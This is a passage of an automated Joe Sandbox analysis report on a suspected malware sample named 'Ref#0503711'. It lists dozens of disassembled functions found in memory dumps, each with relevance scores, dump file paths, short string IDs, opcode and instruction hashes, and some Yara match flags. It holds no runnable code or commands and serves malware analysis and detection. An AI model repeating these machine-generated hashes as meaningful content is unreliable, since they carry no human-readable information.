                                                                • Opcode Fuzzy Hash: dae8ef815cabbb15c47b57896cd68e1be3fff7fb535ca92fe8244a8363ecf547
                                                                • Instruction Fuzzy Hash: 1B510978E4020E9FDF04CFA9D980AEDBBF1BF89310F14A569D405EB254DB35A946CB50
                                                                Function 060BEDB9 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: ecdba8d28f30dfe7e2c28fdc7caacc3f16fc8ce84cd4c5c9f03f3784a0c8a7d0
                                                                • Instruction ID: 5cec4f70080f9261ecabf68c59134f51a5730a5336c401fbf73e6dd01eeed5ae
                                                                • Opcode Fuzzy Hash: ecdba8d28f30dfe7e2c28fdc7caacc3f16fc8ce84cd4c5c9f03f3784a0c8a7d0
                                                                • Instruction Fuzzy Hash: DA417030B906148FCB94AB64C854AEEBBFBEFC9700F109429E4129B394CF749C46CB91
                                                                Function 01972B80 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 8f0f792cc79b517ab47bc914bf6d157884ce2616f4603a0640759d08f582234d
                                                                • Instruction ID: a4f2e779d00772484a16a189d9e3ed558c6e4e56414ad4bd618d7b337cdb247f
                                                                • Opcode Fuzzy Hash: 8f0f792cc79b517ab47bc914bf6d157884ce2616f4603a0640759d08f582234d
                                                                • Instruction Fuzzy Hash: CC418C31F1010A8BCB10CFA9D8805AEFBB6FF85212F18C5AAD519D7709D331A9928B90
                                                                Function 060AECC7 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BKl
                                                                • API String ID: 0-1208078232
                                                                • Opcode ID: 9370420b7568fec22856b1ff21596656f72703c08141fd5e834e16330f016952
                                                                • Instruction ID: a9e9668775408ffe4afebef58018a04831b17a4db9c62038398188da644266cc
                                                                • Opcode Fuzzy Hash: 9370420b7568fec22856b1ff21596656f72703c08141fd5e834e16330f016952
                                                                • Instruction Fuzzy Hash: C8511874E41209DFDB48DFA9D884AEEBBF2FB88310F10812AE405A7350D7749945CF94
                                                                Function 060AECD8 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BKl
                                                                • API String ID: 0-1208078232
                                                                • Opcode ID: 06c464206aba6790c8c2436a32e912495f2d790c30595c31ce2de20eebd19b40
                                                                • Instruction ID: c671c27c8ae2bc431aad3f75960346437093a823688ae6f3494dcc443847e2aa
                                                                • Opcode Fuzzy Hash: 06c464206aba6790c8c2436a32e912495f2d790c30595c31ce2de20eebd19b40
                                                                • Instruction Fuzzy Hash: 63410870E41209DFDB48DFA9D884AEEBBF6FB89300F10812AE519A7350DB749941CF94
                                                                Function 060BB529 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: 7abe2d39f943b1cf609a6e3ef77df21a9a4e7e7ccb1d4cbf302f022a6b0b8e95
                                                                • Instruction ID: ae3b1e73d42f2a7a0d02c4af1852bd33cc2bfe6f0aa21c87bbb8012f05ad536c
                                                                • Opcode Fuzzy Hash: 7abe2d39f943b1cf609a6e3ef77df21a9a4e7e7ccb1d4cbf302f022a6b0b8e95
                                                                • Instruction Fuzzy Hash: 6B41C674B40218CFDB48DF64D998AADBBB2FF49305F119158E502AB3A5CB75EC42CB40
                                                                Function 060BA190 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: a69331651cf1863277f2ba443673ca3866a63a7f72c3a7dbf784d428aeb0fcde
                                                                • Instruction ID: eb1f0f1ec21bb2ae5aa6bde33b001e48060a48039d189d8bdee9f245676e226f
                                                                • Opcode Fuzzy Hash: a69331651cf1863277f2ba443673ca3866a63a7f72c3a7dbf784d428aeb0fcde
                                                                • Instruction Fuzzy Hash: F131BF36B402149FCF48DFA4D954999BFBBEF88311B058069EA069B365DB72DC42CB90
                                                                Function 060B1570 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (bq
                                                                • API String ID: 0-149360118
                                                                • Opcode ID: 5309c7e0eba5ca5cd5db4a5c5f6735c03125d90824dd4f63e611804deb9f3968
                                                                • Instruction ID: 5849162f3d7e5ae04f86550af4aacbc0dd14874a610063dc452db6815a1f99b7
                                                                • Opcode Fuzzy Hash: 5309c7e0eba5ca5cd5db4a5c5f6735c03125d90824dd4f63e611804deb9f3968
                                                                • Instruction Fuzzy Hash: 8821F5367442559FCB055F69D8509AF7FA7EFC9361B14807AE909CB360DE319C05C790
                                                                Function 060CE9C0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 060CEA5F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1723348881.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60c0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: ea4c9adf286b81a3bea67677798d37296a6b6697deab2d744b968fc0dd91b2b4
                                                                • Instruction ID: a88f00d28e1783b9a2dde937be201756726aae41dbb8d4af50d394f3c9aa1764
                                                                • Opcode Fuzzy Hash: ea4c9adf286b81a3bea67677798d37296a6b6697deab2d744b968fc0dd91b2b4
                                                                • Instruction Fuzzy Hash: 5A3198B9D002589FCF14CFA9D884AEEFBB1BB49320F14942AE814B7210D735A945CF94
                                                                Function 01974559 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Te^q
                                                                • API String ID: 0-671973202
                                                                • Opcode ID: c5c6d950ac32d214f3656e7af4ff16576a82bc41104dd7c846c70e4606187894
                                                                • Instruction ID: 9d93607379e8d291c8b9b3c284e9540c1f6910bbbf390709cf9bc90bb6736d77
                                                                • Opcode Fuzzy Hash: c5c6d950ac32d214f3656e7af4ff16576a82bc41104dd7c846c70e4606187894
                                                                • Instruction Fuzzy Hash: 0921AF30B002099FCB44AF79D494AAEBBE2EFC9B10F154929E405EB3B1DE759C41CB90
                                                                Function 01972CF8 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \s^q
                                                                • API String ID: 0-4111632511
                                                                • Opcode ID: 7c4bfb11e94248e63fcfcf7e9c8a396fa08c0c35c9b431f3a77891d7a80bc1ea
                                                                • Instruction ID: ffed59c9383c42d3427b830db67be4617f9d0b6cf06e64a48ef14f4cf0765a3f
                                                                • Opcode Fuzzy Hash: 7c4bfb11e94248e63fcfcf7e9c8a396fa08c0c35c9b431f3a77891d7a80bc1ea
                                                                • Instruction Fuzzy Hash: 3521EE317504208FC794DB7DD814D6A7BF9EFC971530584AAE50ECB372DA21CC428B90
                                                                Function 060B5890 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p<^q
                                                                • API String ID: 0-1680888324
                                                                • Opcode ID: f317d5cc950661bbea3263f0686deda1266d17c4e746f65b4639c7b703f1b7e8
                                                                • Instruction ID: d91465ac76e5c11047cc41a6bc9e74d2a08e1f3504148bb60060adea2b08e862
                                                                • Opcode Fuzzy Hash: f317d5cc950661bbea3263f0686deda1266d17c4e746f65b4639c7b703f1b7e8
                                                                • Instruction Fuzzy Hash: 9B216D316441489FCB56CF2ACC549AA7FFAEF89210B1980A6F844DB2A1CA71DC51CB20
                                                                Function 060B58A0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p<^q
                                                                • API String ID: 0-1680888324
                                                                • Opcode ID: 0045aed55d47bc9ead7cdc8d0a5a54bcd93c6c36c224a44267bf88e059c33645
                                                                • Instruction ID: 248f5f455e8c640a3d8cf04842f95297fc021f6e6c994413565186e31999eeca
                                                                • Opcode Fuzzy Hash: 0045aed55d47bc9ead7cdc8d0a5a54bcd93c6c36c224a44267bf88e059c33645
                                                                • Instruction Fuzzy Hash: DB214F717401589FCB96CF2ACC40AEA7FEAEF89210B1580A6FD54DB3A1CA75DC51CB60
                                                                Function 06210881 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                • Opcode ID: 965162dde6f287087fc2fab8295d84db4a82817e1a6f1a8af8b98907a279883b
                                                                • Instruction ID: 2ccba94adc823916a31db49dfea56a9679c29cc6f8c991b6c86a936e33fda755
                                                                • Opcode Fuzzy Hash: 965162dde6f287087fc2fab8295d84db4a82817e1a6f1a8af8b98907a279883b
                                                                • Instruction Fuzzy Hash: 6011F774818268CFEB60CF15D888BDCB7F5AB55309F1084D6D409BB240CB794AC5CF54
                                                                Function 01970B08 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8bq
                                                                • API String ID: 0-187764589
                                                                • Opcode ID: 0bb1656a2b0a260acc6122599c37a88b27b833b1fd3760fc67c842cefe457409
                                                                • Instruction ID: 0ed0d423442371d790c6717bad5e82408e54c832aaebe2ac0a857a71f4205ed9
                                                                • Opcode Fuzzy Hash: 0bb1656a2b0a260acc6122599c37a88b27b833b1fd3760fc67c842cefe457409
                                                                • Instruction Fuzzy Hash: F5F096356402008FD340AFBDD450AAAB7E6FFC52117154579D505D77B0DB298C478B91
                                                                Function 062101BB Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: <
                                                                • API String ID: 0-4251816714
                                                                • Opcode ID: 4214e4b01b7dc2222f86496b3aa4e8255af02bcb36b15c803928af959873455c
                                                                • Instruction ID: c11197bd92f7f98ec9d58c8b53b04de00bd1bc7f4a4bec682fb54a2bd5f3f25a
                                                                • Opcode Fuzzy Hash: 4214e4b01b7dc2222f86496b3aa4e8255af02bcb36b15c803928af959873455c
                                                                • Instruction Fuzzy Hash: 4C1169B4905268DFEBA1CF64CC88BE8BBB1AB49314F1081D9D80EA7254CB755EC5CF40
                                                                Function 060ABE43 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )
                                                                • API String ID: 0-2427484129
                                                                • Opcode ID: 69efc296e63517a289f8d98742ac872af8746ddef1ec18257176db6bf81ac81b
                                                                • Instruction ID: 69e94492408ef7d227b219dbbc06a4fc1020ad9414b4af625d9eb2a6d773a1dc
                                                                • Opcode Fuzzy Hash: 69efc296e63517a289f8d98742ac872af8746ddef1ec18257176db6bf81ac81b
                                                                • Instruction Fuzzy Hash: A501EC74B41205DFD794DF68D591D9DBBF2FF88200B54862AD40ADB364DB74AC42CB44
                                                                Function 06210C6F Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $
                                                                • API String ID: 0-3993045852
                                                                • Opcode ID: e162937d8c9e69f31c30af7bd3c124dfa3b8bd5ba745ff09165392a805153b19
                                                                • Instruction ID: 4af6d88679d02e8ef72276aae75075543bbc8f9c92df840b8a96650d9cc56fc1
                                                                • Opcode Fuzzy Hash: e162937d8c9e69f31c30af7bd3c124dfa3b8bd5ba745ff09165392a805153b19
                                                                • Instruction Fuzzy Hash: 3A01C0B4905268CFEFA0CF64C888BDDBBB1AB08304F1080D9D969A7251CB365EC1CF00
                                                                Function 06341522 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725206638.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6340000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8
                                                                • API String ID: 0-4194326291
                                                                • Opcode ID: f23c500c8eba3c69c94327b1fa0675409b2d6330857c7d33f6057b3009dff5f8
                                                                • Instruction ID: 519604cab1e02c546c532916ddbc39267ccf4c4612b8be7b49bf68a521862b2a
                                                                • Opcode Fuzzy Hash: f23c500c8eba3c69c94327b1fa0675409b2d6330857c7d33f6057b3009dff5f8
                                                                • Instruction Fuzzy Hash: B901A278A012188FDB60DF18D8845DABBF5FB88304F1080EAE509A3754DB345F82CF90
                                                                Function 01970B18 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1690988118.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1970000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8bq
                                                                • API String ID: 0-187764589
                                                                • Opcode ID: a90871a46bff22e186f4276fcef2d885e4cc7fa2ea501163b05bc5410ee00ad2
                                                                • Instruction ID: 38380586e62307456d568e8ef432305ee36801143874ff73083ffb739b6bf46f
                                                                • Opcode Fuzzy Hash: a90871a46bff22e186f4276fcef2d885e4cc7fa2ea501163b05bc5410ee00ad2
                                                                • Instruction Fuzzy Hash: FFF0A9393005009FD340EB6EE844A1AB7EBFBC9212B400128E90ACB3A0CF21DC478BA5
                                                                Function 0621031D Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9
                                                                • API String ID: 0-2366072709
                                                                • Opcode ID: eb5298d04b709d4988c19ff6618e9c84659d597d96de53e28c8fdf09f15e4963
                                                                • Instruction ID: d0178d9e03424202548df78d10542972ad58b6e3de9f64f610e62489c1e75e96
                                                                • Opcode Fuzzy Hash: eb5298d04b709d4988c19ff6618e9c84659d597d96de53e28c8fdf09f15e4963
                                                                • Instruction Fuzzy Hash: C3F0BD74A16229DFEB61DF64D948BDDBBB1AB09300F100099E949AA240CB751E80CF41
                                                                Function 06210DDF Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1725062334.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6210000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4
                                                                • API String ID: 0-4088798008
                                                                • Opcode ID: 812b7d5dde75f5a49aad9758282778ce4212168b4130c455485a116da3071b48
                                                                • Instruction ID: afb45fcac9d5a43fe6773d91d4ee6878a883ad17cd9d868eee7bd217f060aeec
                                                                • Opcode Fuzzy Hash: 812b7d5dde75f5a49aad9758282778ce4212168b4130c455485a116da3071b48
                                                                • Instruction Fuzzy Hash: A3F0BDB4A16228DFEB61DF64D948BDDBBB1BB09300F004199E949BA240CB751E80CF41
                                                                Function 06011BD6 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 3
                                                                • API String ID: 0-1842515611
                                                                • Opcode ID: 550823d2c80dcaa0918c830bba89533fa251514138cc30cdb77af737b0e93404
                                                                • Instruction ID: 539018483986875b0410f9c890f48146623db9e2a34e4c504472764c450a56e8
                                                                • Opcode Fuzzy Hash: 550823d2c80dcaa0918c830bba89533fa251514138cc30cdb77af737b0e93404
                                                                • Instruction Fuzzy Hash: D9F07F74911169CFEBA4DF60CC88B9CBB71FB88200F1085D6980A73260DB346EC4CF50
                                                                Function 060109FE Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: E
                                                                • API String ID: 0-3568589458
                                                                • Opcode ID: 2addd366b36cdef9f2d0cd4abc3797e699e2a6e1504fab64cea4e6333e18f5ff
                                                                • Instruction ID: 85c4d5cb0d28881537eb2635695995b6c5726ded52b73a0a10ee5e3c8688f02c
                                                                • Opcode Fuzzy Hash: 2addd366b36cdef9f2d0cd4abc3797e699e2a6e1504fab64cea4e6333e18f5ff
                                                                • Instruction Fuzzy Hash: EEE09274C49228CFEF90CF60CC88B9DBBB1AB48314F105199C50A77250DB3819C5CF44
                                                                Function 06010CC0 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1719727888.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: true
                                                                • Associated: 00000000.00000002.1719009997.0000000005FA0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5fa0000_Ref#0503711.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2
                                                                • API String ID: 0-450215437
                                                                • Opcode ID: 0a0e74a814c417269640a1607c50c6c6ab87189cc2ad70ae473fb79b93c9789c
                                                                • Instruction ID: 4fca2e326d351216a3493ebcebb0735aedf2d602595e11f4b06d460a5bbfee92
                                                                • Opcode Fuzzy Hash: 0a0e74a814c417269640a1607c50c6c6ab87189cc2ad70ae473fb79b93c9789c
                                                                • Instruction Fuzzy Hash: DFD06C78D462288FDF60CF20CD89ADDBBB1AB48305F2050DAD809B3351DB301E84CE45
                                                                Function 060BF008 Relevance: .4, Instructions: 437COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb862e4c4c43e03210a8fbd5f01575889412201da59572b35df575c85b21391b
                                                                • Instruction ID: 6558c9d8cb5b021a5ec65f2ad2fe5678cebf7813cabf3770a14df1dc70442229
                                                                • Opcode Fuzzy Hash: cb862e4c4c43e03210a8fbd5f01575889412201da59572b35df575c85b21391b
                                                                • Instruction Fuzzy Hash: C4121934A502198FCB94EF64CD94A9DBBB2BF89300F5095A8D54AAB365DF30ED85CF40
                                                                Function 060BEFF8 Relevance: .2, Instructions: 237COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4fb673a4e33a19cfec7c76b7dae086182c22d23381f61d70a7c6879394eb202
                                                                • Instruction ID: c580d0ddaf6b15975fcfde3c0d36c4221ecac1273e91720f0e5691db88a34feb
                                                                • Opcode Fuzzy Hash: d4fb673a4e33a19cfec7c76b7dae086182c22d23381f61d70a7c6879394eb202
                                                                • Instruction Fuzzy Hash: A6A10934B402198FCB54DF24CD94BA9BBB2BF89300F5095A8E54AAB365DB74ED85CF40
                                                                Function 060A81CA Relevance: .2, Instructions: 233COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 55d22be98342c8ccad04f1c561e7e5570979decea88909be9960471fda253f24
                                                                • Instruction ID: 844e972cbf43031f20b1943298b7684744f154d70f75338f47da61875dd5b4bd
                                                                • Opcode Fuzzy Hash: 55d22be98342c8ccad04f1c561e7e5570979decea88909be9960471fda253f24
                                                                • Instruction Fuzzy Hash: E3B10574E41218CFEB94CFA4D894BAEBBF2FB89344F10809AD509AB291DB345D85CF45
                                                                Function 060B23F8 Relevance: .2, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9b2f8abf996e8164728fe2aa8366087a2066a1b35844ab9bfb34e7871e41fde
                                                                • Instruction ID: 44faeb2f1b00c354919259538d2dbec4c19e053e2fd94e6bd27e5a5ad3bca919
                                                                • Opcode Fuzzy Hash: b9b2f8abf996e8164728fe2aa8366087a2066a1b35844ab9bfb34e7871e41fde
                                                                • Instruction Fuzzy Hash: 7B819C35B812149FCB49DF64D994AEDBBF6EF88342F108469E911AB390CB35DE41CB50
                                                                Function 060B7A28 Relevance: .2, Instructions: 208COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1722786037.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60b0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9662f56b090cac25801630d7ceddc3baf7678c60bd590c6a19c4861caf6ac496
                                                                • Instruction ID: ffad957c6e4be49606329be8448e3edd4b6ad73a3b750370ae46642affe0925d
                                                                • Opcode Fuzzy Hash: 9662f56b090cac25801630d7ceddc3baf7678c60bd590c6a19c4861caf6ac496
                                                                • Instruction Fuzzy Hash: 46811775A406188FCB54DF68C484E9EBBF6FF88350B1695A9E806DB361DB30ED41CB90
                                                                Function 060A82D7 Relevance: .2, Instructions: 176COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1721982304.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_60a0000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0bbcbbf092f22ae96314e47a6bb282056eeebb4fb5361a4ed2219b65c309e5b
                                                                • Instruction ID: 8de0b233fa210be1ae1fdd27883bc211a962b628ef7a961948e70e20b8f6db33
                                                                • Opcode Fuzzy Hash: a0bbcbbf092f22ae96314e47a6bb282056eeebb4fb5361a4ed2219b65c309e5b
                                                                • Instruction Fuzzy Hash: 3871C174D45218CFEB94DFA4C884BADBBF2FB89384F1081AAD109AB291DB345D85CF45
